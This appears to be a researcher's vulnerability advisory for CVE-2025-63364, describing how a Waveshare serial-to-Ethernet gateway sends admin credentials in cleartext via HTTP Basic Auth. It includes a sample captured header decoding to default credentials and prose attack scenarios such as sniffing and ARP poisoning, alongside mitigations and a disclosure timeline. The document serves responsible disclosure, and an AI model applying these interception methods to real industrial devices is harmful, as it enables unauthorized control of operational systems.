Post 04 | Waveshare RS232/485 Gateway: Cleartext Transmission of Admin Credentials (CVE-2025-63364)
1. Executive Summary
CVSS v3.1 Base Score: 7.5 (High) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0 Base Score: 8.7 (High) — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N
CVE ID: CVE-2025-63364
ATTENTION: Exploitable remotely / no authentication or user interaction required
Vendor: Waveshare Electronics
Equipment: Waveshare RS232/485 TO WIFI ETH (B) Serial-to-Ethernet/Wi-Fi Gateway
Vulnerability: Cleartext Transmission of Administrator Credentials via HTTP Basic Authentication
The device transmits administrator credentials using HTTP Basic Authentication over unencrypted HTTP. Attackers on the same network segment can intercept credentials in transit and gain full administrative control of the device.
2. Risk Evaluation
This vulnerability poses significant security risk because:
- Credentials are transmitted in Base64 (not encrypted), making interception trivial.
- No TLS/HTTPS support exists, exposing all authentication traffic.
- Attackers with access to the same subnet can compromise credentials passively.
- Once compromised, attackers can alter serial routing, manipulate network settings, or pivot deeper into ICS/IIoT networks.
- Exposure can lead to unauthorized device reconfiguration or operational disruption.
In environments where serial devices bridge critical automation systems, a compromised gateway may impact process reliability and safety.
3. Technical Details
3.1 Affected Products
- Waveshare RS232/485 TO WIFI ETH (B)
- Firmware: V3.1.1.0
- Hardware: 4.3.2.1
- Web Interface: V7.04T.07.002880.0301
3.2 Vulnerability Description
The device uses HTTP Basic Authentication for administrative login.
Because the device lacks HTTPS support:
- All authentication requests are sent in plaintext
- Passwords are included in the
Authorization:header encoded in Base64 - Base64 is reversible, making credential recovery trivial
Example captured header:
1
Authorization: Basic YWRtaW46YWRtaW4=
Decoded:
1
admin:admin
This exposure affects all network paths between client and device, including switches, access points, and mirrored traffic captures.
3.3 Attack Scenarios
Scenario 1 — Passive network sniffing
An attacker on the same LAN or Wi-Fi network captures HTTP traffic and extracts the credentials.
Scenario 2 — Rogue access point
If the device is configured over Wi-Fi, an attacker creates a malicious AP to intercept connections.
Scenario 3 — ARP poisoning
Man-in-the-middle attacks can capture login attempts without detection.
Scenario 4 — Compromised workstation
A malware-infected configuration workstation can read outbound Authorization headers.
4. Mitigations
User Recommendations
- Avoid configuring the device on public or shared networks.
- If available, segment device access to a management VLAN.
- Rotate administrator credentials frequently.
- Monitor for suspicious login attempts.
- Review CISA guidance for ICS network segmentation:
https://www.cisa.gov/news-events/ics-alerts/ics-alert-10-301-01
Vendor Recommendations
- Implement HTTPS/TLS support.
- Replace Basic Auth with token-based or session-based authentication.
- Provide local certificate generation or import options.
- Mask sensitive fields in all web responses.
5. Disclosure Timeline
- 16 Sep 2025 — Researcher reported vulnerability to Waveshare
- 23 Sep 2025 — Vendor acknowledged report
- 23–27 Sep 2025 — Researcher requested detailed remediation timeline; none provided
- 27 Sep 2025 — Researcher informed vendor of escalation to MITRE
- 29 Sep 2025 — Reported to MITRE for CVE assignment
- 10 Nov 2025 — CVE reserved
- 11 Nov 2025 — Public disclosure
6. Background
This gateway is used in:
- industrial automation (PLC/RTU/SCADA communication),
- IIoT deployments,
- remote monitoring and telemetry,
- smart building applications,
- embedded development.
Because credentials grant full device control, insecure handling significantly increases operational risk.
7. Researcher
Abhishek Pandey
Payatu Security Consulting Pvt. Ltd.